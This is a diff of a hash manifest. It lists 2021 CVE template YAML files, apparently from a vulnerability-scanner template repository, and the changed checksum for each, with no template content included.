+http/cves/2021/CVE-2021-3297.yaml:6e5e1008540f05d34816da021161df5188678ebb +http/cves/2021/CVE-2021-33044.yaml:42d695b0ac836b6200e769b34d5ec1bc0d8b7980 +http/cves/2021/CVE-2021-33221.yaml:2c4ce02ecb3d32893be929d2123579b4990797c6 http/cves/2021/CVE-2021-33357.yaml:ef068eb074c52746558a4f7ff4485f9b948c5b4f http/cves/2021/CVE-2021-33544.yaml:69108bbbaf50d5dac5de8df9603eca2b55886cf7 -http/cves/2021/CVE-2021-33564.yaml:f2d6354c2dbcdf94ec52265d92ceeab368d40478 -http/cves/2021/CVE-2021-3374.yaml:82fd88a7293f16bbbd6f2f9cb29a6a912657d408 -http/cves/2021/CVE-2021-3377.yaml:813c7aac279a8008bd6c8ff2704d8d71d8da2e23 -http/cves/2021/CVE-2021-3378.yaml:d915bb16dc8bf4b96e7106d29e7ff548f851e490 -http/cves/2021/CVE-2021-33807.yaml:d4addeea28778fd7da85f21e2bbea9b6b3c6e279 -http/cves/2021/CVE-2021-33851.yaml:9132a56bb8e605daf64a4a769964b1c15440d67e -http/cves/2021/CVE-2021-33904.yaml:f5d52a5bee95e9a4edfa7827d65ab8572f53a177 -http/cves/2021/CVE-2021-34370.yaml:a97c98ffb2b0480fc477fb5c60ce214e06dddb89 +http/cves/2021/CVE-2021-33564.yaml:f841959dda310aec791cc0dafe7bb44cfe8f5a8b +http/cves/2021/CVE-2021-3374.yaml:3ffd6e3884ae2e1cbb1a2d7778bd5af8af2b11f6 +http/cves/2021/CVE-2021-3377.yaml:79d6fb4ff137af430c2e376f8e285d6da126c5d5 +http/cves/2021/CVE-2021-3378.yaml:28710b5d19f4f73e8be7ebf5eb4e0351b8bf1ad5 +http/cves/2021/CVE-2021-33807.yaml:6f23268a393779e9c3bcdd00153dfd930a6d84fc +http/cves/2021/CVE-2021-33851.yaml:14987a4606f833262d9a1496afb203d8e1abf970 +http/cves/2021/CVE-2021-33904.yaml:d7aa5bb93cbd6f05fdcc58f8db94cf69b8c1dbfe +http/cves/2021/CVE-2021-34370.yaml:df5c7e2d386f79de2bf319494dbb92eadf7ac311 http/cves/2021/CVE-2021-34429.yaml:2e3f2c988e1913fac83141dd9fc8613138eb7d4a -http/cves/2021/CVE-2021-34473.yaml:0fa84f3304072ad8676e18c20c06f15d83a21890 -http/cves/2021/CVE-2021-34621.yaml:89f8e4f4bd2066ab41c8ef730f41eece3697cbad -http/cves/2021/CVE-2021-34640.yaml:b60c36ab7e85c9b668d08ca97484fca8823377e8 -http/cves/2021/CVE-2021-34643.yaml:80b70493967a324e77da9ca818e8180bf80a5ab4 -http/cves/2021/CVE-2021-34805.yaml:a946682618e112b9db985d29913f1154f13d1f08 -http/cves/2021/CVE-2021-35250.yaml:2c90c062f54a70551b33791db880cde287523a3b -http/cves/2021/CVE-2021-35265.yaml:41f145aa8d735424c608148bd4fabd546d1f643e -http/cves/2021/CVE-2021-35323.yaml:0fa9fea66d4f63ab9995e896b5f04593bbd02d7f -http/cves/2021/CVE-2021-35336.yaml:5a0dd532933f1e8db157ab9ec9192a518e2afb6c -http/cves/2021/CVE-2021-35380.yaml:3f7882e80ca8cfa68e4236aa2f86e8358cbfa2e0 -http/cves/2021/CVE-2021-35464.yaml:477079912a8c25a2bd483fdf1458a9a047026d45 -http/cves/2021/CVE-2021-35488.yaml:d66076315391e6a9db0e6ac3e212f09725b9b59d -http/cves/2021/CVE-2021-35587.yaml:f1f7e487bcffba86db35f1acdeefbb78c388fe8f -http/cves/2021/CVE-2021-3577.yaml:6bf558ed9540515eabfc308ee5c58c5432629f9a -http/cves/2021/CVE-2021-36260.yaml:ddc0e8fb1204e0e8497a9b0d73627ac2de0e2f03 -http/cves/2021/CVE-2021-36356.yaml:73cc015db93111449f9d35fb5b490b7c9becc956 -http/cves/2021/CVE-2021-36380.yaml:22ae3c4e7cd092636998a73652121095b0306d96 -http/cves/2021/CVE-2021-36450.yaml:6611cb1b41c31d9d66f7cac8a9baa3918273871e -http/cves/2021/CVE-2021-3654.yaml:6f6997229d2ec67af783bd467f4e49d891bcb303 -http/cves/2021/CVE-2021-36580.yaml:dcbcc5aaa16b92505ef9dbf53473f4b64ae4d711 -http/cves/2021/CVE-2021-36748.yaml:488c699739dc1691954a3540208fc821467b173f -http/cves/2021/CVE-2021-36749.yaml:aab4d537adaff2fb9a9bdee18e033693c55946ec -http/cves/2021/CVE-2021-36873.yaml:c09f32949b605fdf2bb4a2b993043711bb858f56 -http/cves/2021/CVE-2021-37216.yaml:441241388489b985803463b99251e9dcfb5ec11a -http/cves/2021/CVE-2021-37304.yaml:74932a256f4ae1ba2536b83207f5276eb0f6d036 -http/cves/2021/CVE-2021-37305.yaml:7b1022f8e8f8a4d44578c2572c779b1c8ef31c72 -http/cves/2021/CVE-2021-37416.yaml:ce1fd505090ff8cb1b83f0fefbeab1a735fb2b4e -http/cves/2021/CVE-2021-37538.yaml:a359aca80b32a53f4babe0de7ac529709804537b -http/cves/2021/CVE-2021-37573.yaml:b3baa92bbf0040ff70cb3c971e78fee1b76081ef -http/cves/2021/CVE-2021-37580.yaml:09a2b9031a3f7494bc1c6b284d68b6c304e31bcf -http/cves/2021/CVE-2021-37589.yaml:49596951b7841ee1b55b3c77cfb6b9147a0ddcba -http/cves/2021/CVE-2021-37704.yaml:1c3734573cccba8cdbcf61b0cb6cddf7d2f6a142 -http/cves/2021/CVE-2021-37833.yaml:26051fc04e2321dc9d055c79f0e6e9b9fdb86834 -http/cves/2021/CVE-2021-38314.yaml:c7a825ad4bc208c242722cb07f6c0d9a572e412c -http/cves/2021/CVE-2021-38540.yaml:15ab71adfb784406d94f30668a79a8ad0b89ce82 +http/cves/2021/CVE-2021-34473.yaml:10ea8e036013325a06c88c09a7c3759605f0c842 +http/cves/2021/CVE-2021-34621.yaml:c983e54f26b309de15ce7e506e760ebc68281487 +http/cves/2021/CVE-2021-34640.yaml:526672f610b768ceb02eba4081880c3a85e67954 +http/cves/2021/CVE-2021-34643.yaml:1054f8f817b4d82556df2fd8f41ce055581471cc +http/cves/2021/CVE-2021-34805.yaml:bd3bd4d3c20480c975c76437bb7bdbb16167eb5c +http/cves/2021/CVE-2021-35250.yaml:ce0edab76b31fd17aed84c3a8462bc88d77ed54f +http/cves/2021/CVE-2021-35265.yaml:1b4f418cac3634711542a7bd5c5470de7cfa8f67 +http/cves/2021/CVE-2021-35323.yaml:31c4e2f8cec3cf7b9abf167c18e9cb12db001fc0 +http/cves/2021/CVE-2021-35336.yaml:4c161a619c46cec86a650d6ae18402b99e695b6a +http/cves/2021/CVE-2021-35380.yaml:65d122e097bb0db50a40d589183a646d2030ecb7 +http/cves/2021/CVE-2021-35464.yaml:32ada40a6637e4ad8c6648931cf5c958d3ab2307 +http/cves/2021/CVE-2021-35488.yaml:1c75f377bebdf6c6f25655edd58eb860a2b83f63 +http/cves/2021/CVE-2021-35587.yaml:da7bea0a7d3b1dcf0665ebe7ad6c6dc1a3ff7153 +http/cves/2021/CVE-2021-3577.yaml:27af9b57562080966fa2b59f8b2bd8569ce61923 +http/cves/2021/CVE-2021-36260.yaml:61dd3557037e0be37a2cf659ff719432d78deca6 +http/cves/2021/CVE-2021-36356.yaml:65e76ef7794a288d748ef357e16c46a021fca89b +http/cves/2021/CVE-2021-36380.yaml:e76068ecea5490be03072d19d100be40dc051cb6 +http/cves/2021/CVE-2021-36450.yaml:4b7effbd9b85871cf9d94d372c0adeb71239cc4e +http/cves/2021/CVE-2021-3654.yaml:6e158076722e0e871c50d60f12330428e81b3bc6 +http/cves/2021/CVE-2021-36580.yaml:c7e7ef0429e21ffa3409c847af9bd6e81abdb072 +http/cves/2021/CVE-2021-36748.yaml:c391f26c827c8f6049e3c6b54d0e5544454e173a +http/cves/2021/CVE-2021-36749.yaml:5ec25218865dd1ad6001b328bdd3ef81d993e095 +http/cves/2021/CVE-2021-36873.yaml:7cd0d73ce5fddc6936c201ac1181cc3c521d08f4 +http/cves/2021/CVE-2021-37216.yaml:65bff74a96348af4852fb1a1b071f9404173b560 +http/cves/2021/CVE-2021-37304.yaml:2e3ab053e61f90aac829ed3c3c4bb7b43d4f722a +http/cves/2021/CVE-2021-37305.yaml:f0b5989f8078850c683183c37531dccd1e32e4c3 +http/cves/2021/CVE-2021-37416.yaml:d5a9ee5a8d9f06470f4a229bca44b2bc444a1b25 +http/cves/2021/CVE-2021-37538.yaml:f59c474bc3a1445e21f6d78a82f70384a26ae1c5 +http/cves/2021/CVE-2021-37573.yaml:0363e33ea679baaabd36a670bb538cdfe50855cb +http/cves/2021/CVE-2021-37580.yaml:80a719409b2f31a80c0cfe7b4cd2243b54e7ca7d +http/cves/2021/CVE-2021-37589.yaml:f7181924d5a14b66fbd67356be3a41435b598941 +http/cves/2021/CVE-2021-37704.yaml:0130464033c43d4773cf4c510b1b9146924f6884 +http/cves/2021/CVE-2021-37833.yaml:2ab2030ae021d7e578c36bb10fac22f6d8881772 +http/cves/2021/CVE-2021-38314.yaml:1cf677e962b43652a406fd4f2cf39f2decb37374 +http/cves/2021/CVE-2021-38540.yaml:7f5ebb9e3a50cd765a1521392c3500deb643a19b http/cves/2021/CVE-2021-38647.yaml:7e00013acd51030d8075a01d3d787d7d9dba436b -http/cves/2021/CVE-2021-38702.yaml:32d244ea6b93f0ae4b9d5390db8eaef2c97aea16 -http/cves/2021/CVE-2021-38704.yaml:21c5cf5dec20251845887b879890b03a5cbee909 -http/cves/2021/CVE-2021-38751.yaml:2c79aa10f3fe99ef11f70cfbb6f0d647eae26a64 +http/cves/2021/CVE-2021-38702.yaml:03e37a23b8ad93717bc8085f08806d327b5cd0b5 +http/cves/2021/CVE-2021-38704.yaml:685e95dff95f026d95df0eea49bef25e2d04619e +http/cves/2021/CVE-2021-38751.yaml:70a6bb1c4ed93e27f433463aa4810092bc27bbe1 http/cves/2021/CVE-2021-39141.yaml:dbe238331acce402cf8f76d6fc414b44e5207701 http/cves/2021/CVE-2021-39144.yaml:c4fd56e1e8390880ced545cf85dd93ed5557255b -http/cves/2021/CVE-2021-39146.yaml:7c049587c45083209ce85c3be03d498d90e1e00f -http/cves/2021/CVE-2021-39152.yaml:06c0b759cdfe0fd583b4ab097bd2784bdef193b2 -http/cves/2021/CVE-2021-39165.yaml:0f5dc64a775aaeeb82fb532804eecf3eb3e497e7 -http/cves/2021/CVE-2021-39211.yaml:807613d2872f14460d6e80ed77f6074671900639 -http/cves/2021/CVE-2021-39226.yaml:5d2d6d2e793f9694095db67e84464c66a5dc9de4 -http/cves/2021/CVE-2021-39312.yaml:ac77a76729e9173f5920bdcfde54b2e962eb4a43 -http/cves/2021/CVE-2021-39316.yaml:50bae42050d161f03e40360acf124204b255cfaa -http/cves/2021/CVE-2021-39320.yaml:7b2dafb88a845b455936a1e6a4f99fdf3f8ee356 -http/cves/2021/CVE-2021-39322.yaml:32d8a50138f608dfea207f88bfc0b1b974229e62 -http/cves/2021/CVE-2021-39327.yaml:e5ae25ce25f0da6854ea00c463455f7d658227e5 -http/cves/2021/CVE-2021-39350.yaml:5b692190e3a2248d89af02172078b43b0500ec3b -http/cves/2021/CVE-2021-39433.yaml:4e9ae563a9cb440793d175eb687f12034d068ba8 -http/cves/2021/CVE-2021-39501.yaml:36fc127b69ba9d447de267faa90babe3b8b43104 -http/cves/2021/CVE-2021-40149.yaml:9866e559c47dde74564cf156fb663dbc7a2f7767 -http/cves/2021/CVE-2021-40150.yaml:1cf195571756b4ab0ddaf11568f3484bd1c29a2b -http/cves/2021/CVE-2021-40323.yaml:5e776f580b5bfe25d0e014830fa51fac8d531469 +http/cves/2021/CVE-2021-39146.yaml:5f51a1d05b2a15e45e61eea7620a8019ab250422 +http/cves/2021/CVE-2021-39152.yaml:c3318c319fa177a16efa48a1a0a7b20e3dac4e1d +http/cves/2021/CVE-2021-39165.yaml:b0b7198c7e27a9d7d14f50d69a545ea9f84913cd +http/cves/2021/CVE-2021-39211.yaml:a735030aebfcbeabf49de40fb69fb7b6f2ea08cc +http/cves/2021/CVE-2021-39226.yaml:04e4bb894f370ee23ddade4d97a120501ea7e9a8 +http/cves/2021/CVE-2021-39312.yaml:2a899505015b1eef3e32e310268d5e7821f2e1e8 +http/cves/2021/CVE-2021-39316.yaml:adb4b17f87431743ec9f9b7f669c605e87b7f30b +http/cves/2021/CVE-2021-39320.yaml:5d0989dd6c55495d24dc2881216091f947291c6d +http/cves/2021/CVE-2021-39322.yaml:655f3c00922ab0f9a2a6718e85777fa304d02119 +http/cves/2021/CVE-2021-39327.yaml:ff82fc2832b047b6d39487665a842cba79254230 +http/cves/2021/CVE-2021-39350.yaml:70a87e20656ba6f138ea92996379bc9a1d8e86bb +http/cves/2021/CVE-2021-39433.yaml:367083d151e10f721898c0830a2759a231be94d0 +http/cves/2021/CVE-2021-39501.yaml:44d3e9c1bbdba0078691817ff2fb58409ea1f93b +http/cves/2021/CVE-2021-40149.yaml:aefb625e999784c70d1d2a9b2e8b0c3a808c3418 +http/cves/2021/CVE-2021-40150.yaml:6be5b4e6550dc2eface712febaa470d855988073 +http/cves/2021/CVE-2021-40323.yaml:9fa7d755d969bb18291820090bfdc0ebe0ffbd1f http/cves/2021/CVE-2021-40438.yaml:f108e69a15aec958d198561eaba7238c49e66062 -http/cves/2021/CVE-2021-40539.yaml:10e6b28f60e5f7562832f73ae8128df59a897633 -http/cves/2021/CVE-2021-40542.yaml:77ceaa60d64960896430698561a0e4d64e3be019 -http/cves/2021/CVE-2021-40661.yaml:a46e9768813968286d052209d0d7bad5d031e54b -http/cves/2021/CVE-2021-40822.yaml:dfa426ff34f05b4f0a06f7db2170e17bcb75c6a3 -http/cves/2021/CVE-2021-40856.yaml:a132b1f35b9ea7ba4f91bb62d49486d68895f6f0 -http/cves/2021/CVE-2021-40859.yaml:6565de0318f9a51e044acc1d6ecea1bda0911a58 -http/cves/2021/CVE-2021-40868.yaml:4ae0c9ec775ca330393ac2c6c8f2d439c644673b +http/cves/2021/CVE-2021-40539.yaml:61e06a20a93d323715b3eb0e7f4892427282498e +http/cves/2021/CVE-2021-40542.yaml:24ed73dad073f16f81839b147a8fa860601f4600 +http/cves/2021/CVE-2021-40661.yaml:29d92096b1630e87bab900252080e44da0076218 +http/cves/2021/CVE-2021-40822.yaml:83908bc362107ea27c9839eda3a9e620ee7870f5 +http/cves/2021/CVE-2021-40856.yaml:0cdd4db85ccc1ffdf320bf90d94377e070f62407 +http/cves/2021/CVE-2021-40859.yaml:ead750ea695c83af37e85284fd29ee4c6ab6c278 +http/cves/2021/CVE-2021-40868.yaml:337cf53178b997cc928f592da135276ad6c46ee9 http/cves/2021/CVE-2021-40870.yaml:10d5995ec9f06c301aae18504c96ba05761d12e4 -http/cves/2021/CVE-2021-40875.yaml:814c2db3630488a80594e73d99bd216e12829917 -http/cves/2021/CVE-2021-40908.yaml:718c40d30f31be5528c28793525be3435ed62433 -http/cves/2021/CVE-2021-40960.yaml:1a4729ba8ab9e0f229c6a1329dab597cf59d5407 -http/cves/2021/CVE-2021-40968.yaml:58ca604153ea3108f833cd11f6cf33f5fdbb36f8 -http/cves/2021/CVE-2021-40969.yaml:e08f848c272a8920463bc18b4b2a3d4b1c883f06 -http/cves/2021/CVE-2021-40970.yaml:8aff71a58a8d4202806d45e28a81e39ab3f2214a -http/cves/2021/CVE-2021-40971.yaml:6e14106eaa4d29a383010057f5c51e0725c2a891 -http/cves/2021/CVE-2021-40972.yaml:e8e919a125ebbccde542b5ccfac8f80b4354807c -http/cves/2021/CVE-2021-40973.yaml:930b5865013d1cb1f3d398cbe3607c3a86040162 -http/cves/2021/CVE-2021-40978.yaml:08b10a46513bae3baba9d821ed98b3764d1e5fce -http/cves/2021/CVE-2021-41174.yaml:71e812575d68b2d0509e1ea1ffb7e998e8e025d4 -http/cves/2021/CVE-2021-41192.yaml:cb39d6589215e4d4bea7e2f07511de2ab73577f5 -http/cves/2021/CVE-2021-41266.yaml:8817e5661746dd710d3f6c930dc3db173395b782 -http/cves/2021/CVE-2021-41277.yaml:f75f98f12bac7b67d0dcc4be875d8e44177a6ed8 +http/cves/2021/CVE-2021-40875.yaml:ec8d297292fedf7fcfdefb4a66752f1537be9b68 +http/cves/2021/CVE-2021-40908.yaml:90242d13d78161ea04bfa1a7cf18f52255371c22 +http/cves/2021/CVE-2021-40960.yaml:16ca94da3f9a0289b8e18e858041ead2e9484ce1 +http/cves/2021/CVE-2021-40968.yaml:63758f892110192b4183875c0a9f81c54bdb5bd4 +http/cves/2021/CVE-2021-40969.yaml:f3b79f6e5034afe81af2adbb8a7c1faccc13789f +http/cves/2021/CVE-2021-40970.yaml:7e3a202411299a9896fb906d2844a97fe7c35d09 +http/cves/2021/CVE-2021-40971.yaml:1d33fae100452bd70d068acd7d0ee3547409ef02 +http/cves/2021/CVE-2021-40972.yaml:0e116165f067999b4a624606f806043874c95d58 +http/cves/2021/CVE-2021-40973.yaml:e6324ae6cae024f8392f8a62ee826794d675a2ce +http/cves/2021/CVE-2021-40978.yaml:10a009321ead63e56670e438e99cd61474d56aa9 +http/cves/2021/CVE-2021-41174.yaml:26750273a6e86baa7469d782913e689fc9b7bd8b +http/cves/2021/CVE-2021-41192.yaml:440dc2635746e3893b41ac343332a2499c439f76 +http/cves/2021/CVE-2021-41266.yaml:aa058cb0e76f7aad7b8300d5ad8b529ac354d3a1 +http/cves/2021/CVE-2021-41277.yaml:ebbbedbd037789093e73943ab1ac9e3b99bc55b9 http/cves/2021/CVE-2021-41282.yaml:65fe7ff0e6f1b11db1844e23e31570fbbe646e1d -http/cves/2021/CVE-2021-41291.yaml:130e8d410baa1394f4fc54a32899812e5d776fe2 -http/cves/2021/CVE-2021-41293.yaml:b860df51d43c4038202e79833c1f00bee468640c -http/cves/2021/CVE-2021-41349.yaml:e0db514a0d15f299bd42a3bb683d8e2b488f1037 -http/cves/2021/CVE-2021-41381.yaml:4ee86107aba8c25c5bd00b364e90a2882f19f812 -http/cves/2021/CVE-2021-41432.yaml:3140c6979177ada667f55bdb2d7e4d1ceff03fc1 -http/cves/2021/CVE-2021-41460.yaml:958033c8d160936ee48d87dcea427cd591435fa3 -http/cves/2021/CVE-2021-41467.yaml:2d6bcc1ef240aa7b292fe24af39930310a87c14d -http/cves/2021/CVE-2021-41569.yaml:3c95fc0f4c4a813f11a4c8d3ccced6881df9f01a -http/cves/2021/CVE-2021-41648.yaml:56955970e173c86bdd630f54607c8f5465be5861 -http/cves/2021/CVE-2021-41649.yaml:dde28a9acdaf76d6e798d26dc92fc47425c66eb2 +http/cves/2021/CVE-2021-41291.yaml:0bdf7fbc8965cdb0406ec1aabab2b4fa3009921a +http/cves/2021/CVE-2021-41293.yaml:339630a593a9df3fc64bd59f63681fe6469ff9f4 +http/cves/2021/CVE-2021-41349.yaml:e29d9dba470350b8f2018c712d0115529ede5133 +http/cves/2021/CVE-2021-41381.yaml:2f3b2c49bf408619659a0f86946fd3cf23096215 +http/cves/2021/CVE-2021-41432.yaml:054a1bce61f17a7abaed5b7553fe890cf9e21396 +http/cves/2021/CVE-2021-41460.yaml:c7816a2d7d02ec48a44ef563ddd6ca8faf4a3a76 +http/cves/2021/CVE-2021-41467.yaml:67763cebe9f6e1ee2479360f2b7b5898122ed7b6 +http/cves/2021/CVE-2021-41569.yaml:01d67f3113c6a237f9588efd15fcdd87686850c0 +http/cves/2021/CVE-2021-41648.yaml:b06c0b01ef630c87b8e472c01a6c53520abd64be +http/cves/2021/CVE-2021-41649.yaml:3c8f570363b4fd0847f57ce3d9dbe519f8958573 http/cves/2021/CVE-2021-41653.yaml:8ee8ccd98cb56c5a282d2cb0eee806ceb6a7f3e2 http/cves/2021/CVE-2021-41691.yaml:f598a63d2feec552cd0f7a482d63d3cb99b880f2 -http/cves/2021/CVE-2021-41749.yaml:c5084f6f9a23b7e98c93388395f261dc0554c373 -http/cves/2021/CVE-2021-41773.yaml:55a2214f30a56a52a7620c09e736a8323dc46b99 -http/cves/2021/CVE-2021-41826.yaml:473a073268213ba8e4778620ea31a5325b781784 -http/cves/2021/CVE-2021-41878.yaml:a4e51d345a60ad6e4badd90d0aac2f5e258babd0 +http/cves/2021/CVE-2021-41749.yaml:a7e7b5df8dbb1218bfa64f51950d094919220f98 +http/cves/2021/CVE-2021-41773.yaml:d31041a8002f33657974f92f32393b474ac54b2b +http/cves/2021/CVE-2021-41826.yaml:e2ef2ef18ed60d824f4fb17b00cbf846b855d6ae +http/cves/2021/CVE-2021-41878.yaml:4851b6de742b16b75cea63d2ab916ff7a47e6a56 http/cves/2021/CVE-2021-4191.yaml:95833211fac3d524b6667ad4b8670f02f219fa96 -http/cves/2021/CVE-2021-41951.yaml:a4717f15bc882d1c4720b7b58efb7934504b5918 -http/cves/2021/CVE-2021-42013.yaml:430fe15706aae271d355368b7f25663e9af9c090 -http/cves/2021/CVE-2021-42063.yaml:e59a319405ab84ab90c4b24e6570bf538c7aed92 +http/cves/2021/CVE-2021-41951.yaml:12292f33a1347fe34242bd4c1e168c5d70ceccdf +http/cves/2021/CVE-2021-42013.yaml:4c18ffde80890cc9843cbdf68bf102046348f5bb +http/cves/2021/CVE-2021-42063.yaml:84039637d5a831e92004dada7126d9a8d319002c http/cves/2021/CVE-2021-42071.yaml:ca43859622fae8058fee7b8ac38392a662d66c76 -http/cves/2021/CVE-2021-42192.yaml:00ec6bcd023513b66d0968c655efd3ec482fcc56 -http/cves/2021/CVE-2021-42237.yaml:0d41ce910215ea8f15fdb5226ee7744665263be8 +http/cves/2021/CVE-2021-42192.yaml:82cd1d414839b005074a97d0b927a6c2147b59ef +http/cves/2021/CVE-2021-42237.yaml:9e2742c8206c546a49b5dd1a967eed3c2712bb55 http/cves/2021/CVE-2021-42258.yaml:48be1eabf98fabf41b662820856f828af9de4f45 -http/cves/2021/CVE-2021-42551.yaml:a21e196af60d9376e35b22853ca4a06c7246f46a -http/cves/2021/CVE-2021-42565.yaml:5e142b1b177e3e6d5d33372107a1ddc415d19182 -http/cves/2021/CVE-2021-42566.yaml:b6834e2fdfffed9d91974a266de2a068ca2b80d4 -http/cves/2021/CVE-2021-42567.yaml:7602f27c3fe51e08353fa0ece11f3a65e96cb246 -http/cves/2021/CVE-2021-42627.yaml:79ed43ff78e093b3a9d7758da4b7890a1b476926 -http/cves/2021/CVE-2021-42663.yaml:2f3dce87781bbd0f89875bc8c69726bc8f5530ca -http/cves/2021/CVE-2021-42667.yaml:e4c902885a95a470df78b30d7f81f2f0305781f4 -http/cves/2021/CVE-2021-42887.yaml:f702a14e50aa88f3eb7bca5a2eb24114b8631f40 -http/cves/2021/CVE-2021-43062.yaml:8833d21cd7fb8f6de0959b9f46ea3e919233ac3a -http/cves/2021/CVE-2021-43287.yaml:8622fed87af1cf01e2c9d82876bdab2d9103ffc5 -http/cves/2021/CVE-2021-43421.yaml:df2796c4b3305dc3786a067206ab1c7e3499c9a3 -http/cves/2021/CVE-2021-43495.yaml:c59699defeb9801618b2d116fb50b512293d5d41 -http/cves/2021/CVE-2021-43496.yaml:76469e9286f805e0c0da240ad8647d3130cb52e6 -http/cves/2021/CVE-2021-43510.yaml:7a90de767bb818a1072d792319d747d4b3026551 -http/cves/2021/CVE-2021-43574.yaml:01f9df573f9a2436241244531c32d3e8f0d2b0c0 -http/cves/2021/CVE-2021-43725.yaml:8e13797c7d71850af0844694215a4241ef94c5b2 -http/cves/2021/CVE-2021-43734.yaml:345b6e6ac9fb9538628e5631bff18752a1c6c4ad -http/cves/2021/CVE-2021-43778.yaml:71fe0c6291c25bdce783892d370d13a314fa9c65 +http/cves/2021/CVE-2021-42551.yaml:1ce31683d53299a23bf88ed9827d21b28dccf59d +http/cves/2021/CVE-2021-42565.yaml:5a4382199ce1a849b1babcf8fcdf248dfde0f238 +http/cves/2021/CVE-2021-42566.yaml:bea5b6e4bf74b3a65325ee0016a217b02325cc83 +http/cves/2021/CVE-2021-42567.yaml:922fd4ef4435e8cd135aa32b9444bd2189a90d7e +http/cves/2021/CVE-2021-42627.yaml:c0760a101ac4518e2e754e9643aef22ada387d63 +http/cves/2021/CVE-2021-42663.yaml:a5b246ea53a68cf0d9b22ef95d6efac9f588fc4c +http/cves/2021/CVE-2021-42667.yaml:409873f140725eb14170cc60c5ff3c017c71da7e +http/cves/2021/CVE-2021-42887.yaml:ef6caf52721aebcf3ba12df568a01327cf9523a8 +http/cves/2021/CVE-2021-43062.yaml:60ab6def255f026225eaf027969ad7ee616dd39d +http/cves/2021/CVE-2021-43287.yaml:fa6f256eb015b8dfc56fc7288aed23adccce237e +http/cves/2021/CVE-2021-43421.yaml:b996d00baf1185258c52b21ff2b475866956f449 +http/cves/2021/CVE-2021-43495.yaml:dab67377e4c7d3806ca17d764ee0ffa0d1b5bb93 +http/cves/2021/CVE-2021-43496.yaml:e4136acbb34d908f323c5ca551a1538ce98d8b36 +http/cves/2021/CVE-2021-43510.yaml:dc9d3d2505c866a83b41e206d51410ca932826c3 +http/cves/2021/CVE-2021-43574.yaml:1e2cb25c1542f0e26cb46a1673ea94529a3558bd +http/cves/2021/CVE-2021-43725.yaml:f4532e02708426a800ab380cd477f3fff2157af6 +http/cves/2021/CVE-2021-43734.yaml:67b814a7e393b6323d7737332133d54dbe315b60 +http/cves/2021/CVE-2021-43778.yaml:da12e518e4df742b80e7ccc1855d9c8529f6e1bb http/cves/2021/CVE-2021-43798.yaml:c61de90f53cdc059822dfec42fb1e228a85100e5 -http/cves/2021/CVE-2021-43810.yaml:f601dc8d627a59486db2feccc540d8f4b122afc2 +http/cves/2021/CVE-2021-43810.yaml:001328aa873ec6a8fedbcc5b3d8a5dc027dc6ed8 http/cves/2021/CVE-2021-44077.yaml:a16804a30c3a153a726cce39f797ad60351bbc17 -http/cves/2021/CVE-2021-44138.yaml:6ccd30ca2c44643e0863273e7f2997c3c724acc8 -http/cves/2021/CVE-2021-44139.yaml:d92104509b66df1ebf083b94b84d803b393765d1 -http/cves/2021/CVE-2021-44152.yaml:8f9453396ff282e2fb975d2d93a4557409adbcf9 +http/cves/2021/CVE-2021-44138.yaml:7afa70b8a5b254f0db1f2a2ac2781af1e2a90d0c +http/cves/2021/CVE-2021-44139.yaml:3cc40d433f7fc90aa348c304b12f735afcc99806 +http/cves/2021/CVE-2021-44152.yaml:7b0b7a084c4c8b4d3e2c7a0f250a753a66d05f04 http/cves/2021/CVE-2021-44228.yaml:4b042463704fb88df7b35e730c637347fee2ef1a -http/cves/2021/CVE-2021-44427.yaml:c20b03843cc116d09a29b47540265ddc92640609 -http/cves/2021/CVE-2021-44451.yaml:da51bd96999ce4c0a5c50d301d705b7adfebc30b +http/cves/2021/CVE-2021-44427.yaml:4535f633061c2e32e324dfd448cd2f5288aae513 +http/cves/2021/CVE-2021-44451.yaml:0d4f712aeccecbeaf2a31ef8f675c51079f4fdef http/cves/2021/CVE-2021-44515.yaml:341293e42ddaf108e0e76392cf7c431fbef4e954 -http/cves/2021/CVE-2021-44528.yaml:eee5e7e36801ce5b1fa7ce6794ae72cbc6624d25 -http/cves/2021/CVE-2021-44529.yaml:4ba98882357019bad86a744898a77b8f37bb95b1 -http/cves/2021/CVE-2021-44848.yaml:e24b7e79f32a43b60299cc9e0451ee1af1e8572f -http/cves/2021/CVE-2021-45043.yaml:40e15fd55653884183217eb9be3910cdafecfb4e -http/cves/2021/CVE-2021-45046.yaml:30df76b1144a212ef217b26e279aa1a7d57c8e41 -http/cves/2021/CVE-2021-45092.yaml:a4a32de311213a9eacdd194a0e04720a708e89e3 +http/cves/2021/CVE-2021-44528.yaml:77dd7936736f1fec9ad25bf213377e2e784a9c0d +http/cves/2021/CVE-2021-44529.yaml:78281e16f26907a373949f8e755c55393b9054e2 +http/cves/2021/CVE-2021-44848.yaml:6e44bb7f353b41b52d00b5cb7e042d4a53ae83fe +http/cves/2021/CVE-2021-45043.yaml:525eeb9365eca845a632bd1aa4eae84810dfb5c3 +http/cves/2021/CVE-2021-45046.yaml:78693518286e673bc37e8544c9bced93ca9e00a1 +http/cves/2021/CVE-2021-45092.yaml:4cb7bec59e089def51f716936d94040ce7a800e4 http/cves/2021/CVE-2021-45232.yaml:693753798a382def61043a70a9b8ff2f2043e456 -http/cves/2021/CVE-2021-45380.yaml:5d5c90f44aedad0d797cd6b1e7082ca545bd2ad1 -http/cves/2021/CVE-2021-45422.yaml:cf84c54b7a2c16d463e85d7221f7c2964aa83645 -http/cves/2021/CVE-2021-45428.yaml:d3db78037a8c6c42042c1dabccb48f219c832322 -http/cves/2021/CVE-2021-45967.yaml:191c3b73f7fa2881a4a5579025edd488a6331ccb -http/cves/2021/CVE-2021-45968.yaml:d2284d6dbc07acb2a66e26ae23a18a679ffd5aad -http/cves/2021/CVE-2021-46005.yaml:e6237bddc9b202c46871f6c15f2d230c081262f4 -http/cves/2021/CVE-2021-46068.yaml:a4ae23dea61f086cb4d994dd1f8d881f9ee80f29 -http/cves/2021/CVE-2021-46069.yaml:fa0359282f386189e7d499a93529d6524b568e6d -http/cves/2021/CVE-2021-46071.yaml:a2af0e858b43b7ff7760bff7a95a5fe7827de8c3 -http/cves/2021/CVE-2021-46072.yaml:5a5e0b630ce8fc93ec3d32377854766b1a58ce07 -http/cves/2021/CVE-2021-46073.yaml:7049b94bc7fdf5875a29995f2053e642a93db955 -http/cves/2021/CVE-2021-46107.yaml:9ca613044009896c65b098afb6c06d40838735b7 -http/cves/2021/CVE-2021-46379.yaml:82841f18755c4c52f3c08a185ba05098f5c516e7 -http/cves/2021/CVE-2021-46381.yaml:a45950fab4f4d62940db97e285d3d819ed84410c -http/cves/2021/CVE-2021-46387.yaml:44f38b069640bd280b0b4ab9f84e8244e8fb9153 